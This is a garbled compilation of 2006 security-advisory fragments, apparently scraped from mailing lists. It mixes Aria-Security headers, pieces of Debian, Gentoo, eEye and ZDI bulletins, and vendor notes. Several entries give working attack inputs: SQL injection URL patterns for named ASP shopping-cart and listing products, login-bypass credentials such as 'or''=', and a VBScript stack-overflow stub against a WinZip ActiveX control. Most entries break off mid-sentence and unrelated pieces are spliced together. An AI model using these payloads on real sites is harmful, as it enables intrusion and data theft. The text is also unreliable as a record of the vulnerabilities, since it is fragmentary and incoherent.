#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Real Estate Listing System.txt
#---
#Software: Real Estate Listing System
#Method :
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1210-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 14th, 2006
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ASPintranet.txt
#---
#Software: ASPintranet
#Method : Sql Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/SiteXpress.txt
#---
#Software: SiteXpress E-Commerce System
#Method : SQL Injection
#
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/WWWeb Cocepts.txt
#---
#Software: WWWeb Cocepts
#Method : Sql Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/UStore.txt
#---
#Software: UStore | E-Commerce in 15-Minutes
#Method : Sql Injection
#
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/ecommercestore.txt
#---
#Software: E Commerce Store Shop Builder
#Method : SQL
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/eShopping.txt
#---
#Software: eShopping Cart
#Method : SQL Injection
#
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/Engine Manager.txt
#---
#Software: Engine Manager
#Method: SQL Injection
#PoC:
#Aria-Security Team Advisory
#www.Aria-security.Com For English
#www.Aria-Security.net For Persian
#Original Advisory : http://aria-security.net/advisory/bpg.txt
#---
#Software: BPG Content Management System
#Method: SQL Injection
#PoC:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: Dotdeb PHP Email Header Injection Vulnerability
Release Date: 2006/11/14
Last Modified:
The following bug was tested on the latest version of Safari on a fully-patched
Mac OS X 10.4.
A remote attacker may exploit this issue to crash the application, effectively
denying service to legitimate users. Successful exploitation could lead to
remote code execution.
script
var reg =
Raphael Marichez to Nick Boyce (??):
um ... doesn't that make it a *remote* privilege escalation ?
in a certain way... you're right... although that requires the user
complicity, strictly speaking, you're right.
Makes it no less remote.
Not _automatic_ remote, but still very, very much
Nick Boyce wrote:
On 11/7/06, Raphael Marichez [EMAIL PROTECTED] wrote:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql xss (get)
risk:medium
injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]picfield=[sql]
vendor site:http://www.lynxinternet.com/
product:Evolve Merchant
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/viewcart.asp?zoneid='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
Car Site Manager [injection sql xss (get)]
vendor site:http://www.mginternet.com/
product:Car Site Manager
bug:injection sql
risk:medium
injection sql :
http://site.com/csm/asp/detail.asp?l=p='[sql]
http://site.com/csm/asp/listings.asp?l='[sql]
This is bogus, about 5-10 lines above it includes a file which declares
$pathToFiles.
include ('./setup_options.php');
if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
$langOrig=$lang;
vendor site:http://www.funkyasp.co.uk/
product:FunkyASP Glossary v1.0
bug:injection sql
risk:medium
injection sql :
http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='[sql]
laurent gaffié benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
vendor site:http://www.drumster.net/
product:Blogme v3
bug:login bypass xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié benjamin mossé
http://s-a-p.ca/
vendor site:http://www.mginternet.com/
product:Property Site Manager
bug:injection sql ,login bypass , xss
risk:medium
login bypass :
just login with :
user: 'or''='
passwd: 'or''='
injection sql :
http://site.com/asp/detail.asp?l=p='[sql]
http://site.com/asp/listings.asp?l='[sql]
I think the list spam trap ate this message a few weeks ago.
---BeginMessage---
This was supposed to go out on Halloween but it didn't... but either way
all you Mac users can get scared or something. OOGA BOOGA!
pwntego.tar.gz
Description: GNU Zip compressed data
DMA[2006-1031a] - 'Intego
7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;
HTML
HEAD
TITLE/TITLE
/HEAD
BODY
SCRIPT LANGUAGE=VBScript
!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = SMASHTHESTACKHERE
end sub
--
/SCRIPT
OBJECT
I think the list spam trap ate this message a few weeks ago.
---BeginMessage---
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# = ftp://www.openbase.com/pub/OpenBase_10.0 (vulnerable) ?
#
# This is some fairly blatant and retarded
eEye Research - http://research.eeye.com
Workstation Service NetpManageIPCConnect Buffer Overflow
Release Date:
November 14, 2006
Date Reported:
July 25, 2006
Severity:
High (Remote Code Execution)
Vendor:
Microsoft
Systems Affected:
Windows 2000 (Remote Code Execution)
Windows XP SP1 (Local
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
November 14, 2006
-- CVE ID:
CVE-2006-5198
-- Affected Vendor:
WinZip
-- Affected Products:
WinZip 10.0 (pre build 7245)
-- TippingPoint(TM)
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory
Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-041.html
November 14, 2006
-- CVE ID:
CVE-2006-4687
-- Affected Vendor:
Microsoft
-- Affected Products:
Internet Explorer 6
--
vendor site:http://www.webinhabit.com/
product:A+ Store E-Commerce
bug:injection sql xss post
risk:medium
injection sql (get) :
http://site.com/browse.asp?ParentID='[sql]
xss post :
in /account_login.asp:
username =
vendor site:http://www.alanward.net/
product:A-Cart pro
bug:injection sql
risk:medium
injection sql (get) :
/category.asp?catcode='[sql]
/product.asp?productid='[sql]
injection sql (post) :
http://site.com/search.asp
Variables:
/search.asp?search='[sql]
( or just post your query in the
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroupsearchstring='[sql]
( or just post your query in the search